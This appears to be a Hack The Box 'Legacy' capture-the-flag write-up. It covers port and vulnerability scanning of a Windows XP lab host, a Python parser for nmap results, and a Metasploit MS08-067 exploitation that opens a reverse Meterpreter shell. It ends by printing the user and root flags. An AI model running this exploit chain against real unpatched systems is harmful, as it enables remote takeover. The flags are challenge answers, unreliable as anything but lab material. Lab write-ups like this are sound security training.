Legacy
Port Scan Results ⤵️
┌──(kali㉿kali)-[~/Downloads/HTB/Legacy]
└─$ rustscan -t 5000 -a 10.10.10.4 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.4:135
Open 10.10.10.4:139
Open 10.10.10.4:445
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p ")
NMAP SCAN Results ⤵️
┌──(kali㉿kali)-[~/Downloads/HTB/Legacy]
└─$ sudo nmap -sV --script vuln -p 135,139,445 -T5 10.10.10.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 12:19 IST
Nmap scan report for 10.10.10.4
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
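As an added example (not part of this writeup, and not an nmap or Metasploit component), the following Python parser turns the "Host script results" section of `nmap --script vuln` output into structured findings. The point is triage: it separates scripts that reported a confirmed VULNERABLE state from scripts that returned `false`, errored, or were denied access, because a scanner failure such as the `smb-vuln-ms10-061` error above is not evidence that the host is patched. The sample input is constructed from the scan output above with nmap's usual indentation restored (the rendering collapsed it); the function and class names are my own.

```python
"""Parse the host-script section of `nmap --script vuln` output into
structured findings so vulnerable hosts can be triaged or ticketed."""
import re
from dataclasses import dataclass, field

# Constructed sample input: the host-script block from the scan above, with
# nmap's normal indentation restored.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
"""


@dataclass
class ScriptResult:
    script: str
    state: str                 # VULNERABLE / NOT VULNERABLE / ERROR / UNKNOWN
    note: str = ""             # inline value for one-line results (errors, "false", status codes)
    cves: list = field(default_factory=list)
    disclosure: str = ""
    risk: str = ""
    references: list = field(default_factory=list)


# An NSE script id is lowercase and hyphenated (smb-vuln-ms17-010). Matching on
# that shape keeps body lines such as "State:" or a URL from starting a record.
_SCRIPT_LINE = re.compile(r"^\|_?\s*([a-z0-9]+(?:-[a-z0-9]+)+):\s*(.*)$")
_CVE = re.compile(r"CVE-\d{4}-\d{4,}")


def _strip_prefix(line):
    """Turn '|   text' or '|_  text' into 'text'."""
    return re.sub(r"^\|_?\s*", "", line).strip()


def _build(script, inline, body):
    joined = "\n".join(body)
    r = ScriptResult(script=script, state="UNKNOWN", note=inline)
    m = re.search(r"^State:\s*(.+)$", joined, re.M)
    if m:
        r.state = m.group(1).strip()          # e.g. VULNERABLE, LIKELY VULNERABLE
    elif inline.lower() == "false":
        r.state = "NOT VULNERABLE"
    elif inline.upper().startswith("ERROR"):
        r.state = "ERROR"
    # Deduplicate CVEs: the id usually appears both in "IDs:" and in a reference URL.
    seen = []
    for cve in _CVE.findall(joined):
        if cve not in seen:
            seen.append(cve)
    r.cves = seen
    m = re.search(r"^Disclosure date:\s*(\S+)", joined, re.M)
    if m:
        r.disclosure = m.group(1)
    m = re.search(r"^Risk factor:\s*(\S+)", joined, re.M)
    if m:
        r.risk = m.group(1)
    r.references = [ln for ln in body if ln.startswith("http")]
    return r


def parse_host_scripts(text):
    """Return one ScriptResult per NSE script in the host-script block."""
    results = []
    current, body = None, []

    def flush():
        if current is not None:
            results.append(_build(current[0], current[1], body))

    for line in text.splitlines():
        if not line.startswith("|"):
            continue                          # "Host script results:" and anything else
        m = _SCRIPT_LINE.match(line)
        if m:
            flush()
            current, body = (m.group(1), m.group(2).strip()), []
        elif current is not None:
            body.append(_strip_prefix(line))
    flush()
    return results


def vulnerable(results):
    """Scripts that positively reported a vulnerable state."""
    return [r for r in results
            if r.state.endswith("VULNERABLE") and not r.state.startswith("NOT")]


def needs_followup(results):
    """Scripts that could not decide (error, access denied): re-check with
    credentials or another tool instead of treating them as clean."""
    return [r for r in results if r.state in ("ERROR", "UNKNOWN")]


def summary_lines(results):
    """One triage line per confirmed finding, oldest disclosure first."""
    return [f"{r.script}: {', '.join(r.cves) or 'no CVE'} "
            f"(disclosed {r.disclosure or 'n/a'}, risk {r.risk or 'n/a'})"
            for r in sorted(vulnerable(results), key=lambda r: r.disclosure)]


if __name__ == "__main__":
    found = parse_host_scripts(SAMPLE_NMAP_OUTPUT)
    print("\n".join(summary_lines(found)))
    for r in needs_followup(found):
        print(f"follow up: {r.script} ({r.state}: {r.note})")
```

Run against the sample, the summary lists MS08-067 and MS17-010 as confirmed, while `smb-vuln-ms10-061` (script error) and `samba-vuln-cve-2012-1182` (access denied) are flagged for follow-up rather than silently counted as negative.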
SMB Enumeration ⤵️
Through enumeration I found that the SMB service version is vulnerable, so let's exploit it through the Metasploit C2 platform →
┌──(kali㉿kali)-[~/Downloads/HTB/Legacy]
└─$ msfconsole -q
msf6 > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.77 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => 10.10.16.6
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 10.10.16.6:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.16.6:4444 -> 10.10.10.4:1032) at 2023-12-28 12:24:58 +0530
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > shell
Process 520 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>hostname
hostname
legacy
C:\WINDOWS\system32>cd ../../
C:\>systeminfo
systeminfo
Host Name: LEGACY
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: user
Registered Organization: HTB
Product ID: 55274-643-7213323-23904
Original Install Date: 16/3/2017, 7:32:23 ��
System Up Time: 0 Days, 0 Hours, 36 Minutes, 5 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2993 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1.023 MB
Available Physical Memory: 805 MB
Virtual Memory: Max Size: 2.048 MB
Virtual Memory: Available: 2.005 MB
Virtual Memory: In Use: 43 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
NetWork Card(s): 1 NIC(s) Installed.
[01]: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.4
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\
16/03/2017 07:30 �� 0 AUTOEXEC.BAT
16/03/2017 07:30 �� 0 CONFIG.SYS
16/03/2017 08:07 �� <DIR> Documents and Settings
29/12/2017 10:41 �� <DIR> Program Files
18/05/2022 02:10 �� <DIR> WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.342.119.424 bytes free
C:\>cd "Documents and Settings"
cd "Documents and Settings"
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 08:07 �� <DIR> .
16/03/2017 08:07 �� <DIR> ..
16/03/2017 08:07 �� <DIR> Administrator
16/03/2017 07:29 �� <DIR> All Users
16/03/2017 07:33 �� <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.342.115.328 bytes free
C:\Documents and Settings>cd john
cd john
C:\Documents and Settings\john>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john
16/03/2017 07:33 �� <DIR> .
16/03/2017 07:33 �� <DIR> ..
16/03/2017 08:19 �� <DIR> Desktop
16/03/2017 07:33 �� <DIR> Favorites
16/03/2017 07:33 �� <DIR> My Documents
16/03/2017 07:20 �� <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.342.115.328 bytes free
C:\Documents and Settings\john>tree /a /f
tree /a /f
Folder PATH listing
Volume serial number is 00610050 54BF:723B
C:.
+---Desktop
| user.txt
|
+---Favorites
| | MSN.com.url
| | Radio Station Guide.url
| |
| \---Links
| Customize Links.url
| Free Hotmail.url
| Windows Marketplace.url
| Windows Media.url
| Windows.url
|
+---My Documents
| +---My Music
| | Sample Music.lnk
| |
| \---My Pictures
| Sample Pictures.lnk
|
\---Start Menu
\---Programs
| Internet Explorer.lnk
| Outlook Express.lnk
| Remote Assistance.lnk
| Windows Media Player.lnk
|
+---Accessories
| | Address Book.lnk
| | Command Prompt.lnk
| | Notepad.lnk
| | Program Compatibility Wizard.lnk
| | Synchronize.lnk
| | Tour Windows XP.lnk
| | Windows Explorer.lnk
| |
| +---Accessibility
| | Magnifier.lnk
| | Narrator.lnk
| | On-Screen Keyboard.lnk
| | Utility Manager.lnk
| |
| \---Entertainment
| Windows Media Player.lnk
|
\---Startup
C:\Documents and Settings\john>cd Desktop
cd Desktop
C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f
C:\Documents and Settings\john\Desktop>cd ../../
cd ../../
C:\Documents and Settings>cd Administrator
cd Administrator
C:\Documents and Settings\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator
16/03/2017 08:07 �� <DIR> .
16/03/2017 08:07 �� <DIR> ..
16/03/2017 08:18 �� <DIR> Desktop
16/03/2017 08:07 �� <DIR> Favorites
16/03/2017 08:07 �� <DIR> My Documents
16/03/2017 07:20 �� <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.342.098.944 bytes free
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 08:18 �� <DIR> .
16/03/2017 08:18 �� <DIR> ..
16/03/2017 08:18 �� 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.342.094.848 bytes free
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713
I got Administrator access!!
If you have any questions or suggestions, please leave a comment below. Thank you!
This post is licensed under CC BY 4.0 by the author.